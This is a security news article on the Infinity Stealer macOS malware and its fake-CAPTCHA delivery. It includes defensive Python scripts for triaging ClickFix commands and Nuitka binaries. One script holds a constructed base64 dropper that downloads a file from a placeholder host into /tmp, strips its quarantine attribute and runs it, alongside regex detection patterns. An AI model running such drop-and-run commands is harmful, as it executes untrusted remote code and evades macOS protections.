Infinity Stealer: New macOS Malware Uses ClickFix & Python

by Chief Editor

Modern Mac Malware “Infinity Stealer” Exploits User Trust with Fake CAPTCHAs

macOS users are facing a new threat: Infinity Stealer, a sophisticated infostealer that leverages a technique called “ClickFix” to trick users into executing malicious code. Discovered by Malwarebytes researchers, this malware marks the first documented campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.

What is ClickFix and Why is it Effective?

ClickFix does not exploit a software vulnerability; it exploits the user. Victims land on a fake CAPTCHA page that mimics a legitimate service such as Cloudflare’s human-verification check. Instead of a checkbox, the page tells them to open the Terminal application and paste a supplied command to “verify” themselves. The moment the command runs, the infection begins. Because the user types the command into their own shell, it runs with the user’s full privileges, and the browser download warnings and Gatekeeper checks that would apply to a file fetched by the browser never come into play. No exploit is needed, only compliance.

ClickFix step used in Infinity attacks
Source: Malwarebytes

How Infinity Stealer Works: A Multi-Stage Attack

The attack begins on the domain update-check[.]com, which poses as a Cloudflare verification step. The command the page asks the victim to paste is base64-obfuscated; decoded, it downloads and executes a Bash script. That script downloads a Nuitka-built loader into the /tmp directory, strips the com.apple.quarantine extended attribute from it (so Gatekeeper never evaluates the file), and executes it. The loader carries a compressed archive that contains the final Infinity Stealer payload.
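The chain above can be triaged mechanically. The following is an added example written for this page, not Malwarebytes’ tooling or anything recovered from the campaign: it takes a ClickFix-style `echo <base64> | base64 -d | bash` one-liner, decodes it, and flags the stages just described (download to /tmp, quarantine-attribute removal, execution from /tmp). The one-liner, the script it decodes to and the host `example.invalid` are constructed for the demonstration; the regex indicators are my assumptions about how such droppers look, not signatures from the report.

```python
import base64
import re
from typing import Dict, Optional

# Stages of a macOS ClickFix dropper. Assumed, generic indicators written for
# this example; they are not signatures taken from the Malwarebytes report.
INDICATORS = {
    # curl/wget writing its output somewhere under /tmp
    "download_to_tmp": re.compile(r"\b(?:curl|wget)\b[^\n|;&]*(?:-o|--output|-O)\s*/tmp/"),
    # anything piped straight into a shell
    "pipe_to_shell": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    # stripping the quarantine xattr so Gatekeeper never sees the file
    "quarantine_removal": re.compile(r"\bxattr\s+-(?:d|c|rd|rc)\b"),
    # making the dropped file executable
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    # a command that starts with a /tmp path, i.e. running what was just dropped
    "execute_from_tmp": re.compile(r"(?:^|;|&&|\|\|)\s*(?:nohup\s+|exec\s+)?/tmp/\S+", re.M),
}


def extract_base64_payload(command: str) -> Optional[str]:
    """Return the base64 blob from an `echo <blob> | base64 -d` style command, if any.
    macOS base64 accepts -D/--decode; newer builds also accept -d."""
    m = re.search(
        r"(?:echo|printf)\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)",
        command,
    )
    return m.group(1) if m else None


def decode_payload(blob: str) -> str:
    """Decode base64 shell text, tolerating stripped '=' padding."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def triage(command: str) -> Dict[str, object]:
    """Decode a pasted command (if obfuscated) and score it against INDICATORS."""
    blob = extract_base64_payload(command)
    decoded = decode_payload(blob) if blob else ""
    # Scan the outer one-liner and the decoded script together: the pipe-to-shell
    # lives in the former, the download/xattr/exec stages in the latter.
    text = command + "\n" + decoded
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    if hits["download_to_tmp"] and hits["execute_from_tmp"]:
        verdict = "clickfix_dropper"  # full drop-and-run chain present
    elif any(hits.values()):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"obfuscated": blob is not None, "decoded": decoded, "hits": hits, "verdict": verdict}


# Constructed sample: a drop-and-run script of the shape described above, wrapped
# the way ClickFix pages present it. example.invalid is a placeholder host.
SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    "curl -fsSL https://example.invalid/loader -o /tmp/.loader\n"
    "xattr -d com.apple.quarantine /tmp/.loader\n"
    "chmod +x /tmp/.loader\n"
    "/tmp/.loader &\n"
)
SAMPLE_COMMAND = "echo " + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + " | base64 -d | bash"

if __name__ == "__main__":
    result = triage(SAMPLE_COMMAND)
    print(result["verdict"], sorted(k for k, v in result["hits"].items() if v))
    print(result["decoded"])
```

A benign `echo <base64> | base64 -d` that decodes to plain text is reported as obfuscated but clean, so the decision rests on what the decoded script does, not merely on the presence of base64.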

Before stealing data, the malware checks for virtualized or sandboxed environments to avoid analysis. Once active, it targets a wide range of sensitive information.

What Data Does Infinity Stealer Steal?

Infinity Stealer is designed to harvest a significant amount of personal data, including:

  • Credentials from Chromium-based browsers and Firefox
  • macOS Keychain entries
  • Cryptocurrency wallet information
  • Plaintext secrets found in developer files (like .env files)

All stolen data is exfiltrated via HTTP POST requests to a command-and-control (C2) server, and the attackers are notified via Telegram upon completion.

Why Nuitka Makes Detection Difficult

The malware’s authors use Nuitka, an open-source Python compiler, to turn the Python source into a native macOS binary, and this is a key factor in its evasiveness. Tools such as PyInstaller merely bundle the interpreter together with the program’s .pyc bytecode, which an analyst can extract and decompile back to readable Python in minutes. Nuitka instead translates the Python into C and compiles that with a native compiler: the result still links the CPython runtime, but the program logic exists only as machine code, so the bytecode-extraction and decompilation workflow does not apply, and signatures written for PyInstaller-style bundles do not fire. Reverse engineering means disassembling a large C binary full of interpreter API calls, which is considerably slower.

The malware's disassembly view
Source: Malwarebytes
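To tell the two packaging styles apart during triage, here is an added example (my code, not Malwarebytes’ tooling): it scans a binary’s bytes for PyInstaller’s archive cookie versus strings the Nuitka runtime leaves behind. The PyInstaller cookie (`MEI\x0c\x0b\x0a\x0b\x0e`) is documented; the Nuitka markers (`NUITKA_ONEFILE_PARENT`, `__compiled__`) and the zstd frame magic for its compressed onefile payload are assumptions drawn from Nuitka’s bootstrap code, and all of them are strippable, so treat the result as a hint, not a verdict. The sample byte blobs are constructed stand-ins, not real malware.

```python
import re
from typing import Dict, List

# PyInstaller's CArchive cookie ("MEI" + 0c 0b 0a 0b 0e): documented, and present in
# every PyInstaller-built executable because its bootloader searches for it.
PYINSTALLER_COOKIE = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Strings I am assuming the Nuitka runtime / onefile bootstrap leaves in the binary.
NUITKA_MARKERS: List[bytes] = [b"NUITKA_ONEFILE_PARENT", b"__compiled__", b"Nuitka"]
# zstd frame magic; Nuitka onefile builds compress the embedded payload with zstd (assumed).
ZSTD_FRAME_MAGIC = b"\x28\xb5\x2f\xfd"
MACHO_MAGICS = {
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xca\xfe\xba\xbe": "Mach-O universal",
}


def classify_python_packer(data: bytes) -> Dict[str, object]:
    """Heuristic triage of a binary suspected to be compiled or bundled Python."""
    findings: Dict[str, object] = {
        "format": MACHO_MAGICS.get(data[:4], "unknown"),
        "pyinstaller_cookie": PYINSTALLER_COOKIE in data,
        "nuitka_markers": [m.decode() for m in NUITKA_MARKERS if m in data],
        "zstd_frames": data.count(ZSTD_FRAME_MAGIC),
        # both styles embed or link a CPython runtime
        "links_libpython": bool(re.search(rb"libpython3\.\d+", data)),
    }
    if findings["pyinstaller_cookie"]:
        findings["verdict"] = "pyinstaller"  # extract the .pyc files and decompile
    elif findings["nuitka_markers"]:
        findings["verdict"] = "nuitka"  # no bytecode to recover; disassemble instead
    elif findings["links_libpython"]:
        findings["verdict"] = "embedded-python-unknown-packer"
    else:
        findings["verdict"] = "not-obviously-python"
    return findings


def classify_file(path: str) -> Dict[str, object]:
    """Convenience wrapper for a sample on disk."""
    with open(path, "rb") as fh:
        return classify_python_packer(fh.read())


# Constructed byte blobs standing in for real binaries (not real malware):
# a Mach-O header, some filler, and the markers each packer would leave.
SAMPLE_NUITKA = (
    b"\xcf\xfa\xed\xfe" + b"\x00" * 64
    + b"NUITKA_ONEFILE_PARENT\x00" + b"__compiled__\x00"
    + ZSTD_FRAME_MAGIC + b"\x11" * 32
    + b"@rpath/libpython3.12.dylib\x00"
)
SAMPLE_PYINSTALLER = (
    b"\xcf\xfa\xed\xfe" + b"\x00" * 64
    + b"libpython3.11.dylib\x00" + b"\x00" * 16
    + PYINSTALLER_COOKIE + b"\x00" * 8
)
SAMPLE_PLAIN = b"\xcf\xfa\xed\xfe" + b"\x00" * 128

if __name__ == "__main__":
    for name, blob in [("nuitka", SAMPLE_NUITKA), ("pyinstaller", SAMPLE_PYINSTALLER), ("plain", SAMPLE_PLAIN)]:
        print(name, classify_python_packer(blob))
```

A Nuitka verdict tells the analyst to skip the decompiler and go straight to a disassembler; a PyInstaller verdict means the original Python is probably one extraction step away.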

The Growing Threat Landscape for macOS

The emergence of Infinity Stealer underscores a concerning trend: macOS threats are becoming increasingly sophisticated and targeted. Malwarebytes emphasizes that this is not an isolated incident, and users should expect to see more advanced attacks in the future.

Pro Tip:

Never paste commands into the Terminal that you don’t fully understand, especially those obtained from websites or untrusted sources.

FAQ: Infinity Stealer and macOS Security

Q: What is ClickFix?
A: ClickFix is a social engineering technique that tricks users into running malicious commands in their Terminal.

Q: What does Infinity Stealer target?
A: It targets browser credentials, macOS Keychain entries, cryptocurrency wallets, and secrets in developer files.

Q: Why is Nuitka used in this malware?
A: Nuitka compiles Python code into a native binary, making it harder to analyze and detect.

Q: How can I protect myself?
A: Do not paste commands from websites or other untrusted sources into your Terminal. A real CAPTCHA never asks you to open Terminal; a “verification” page that does is the attack itself. Treat any command that decodes base64 and pipes the result into a shell as hostile.

Stay informed about the latest threats and practice safe browsing habits. Regularly update your macOS and security software to ensure you have the latest protections.
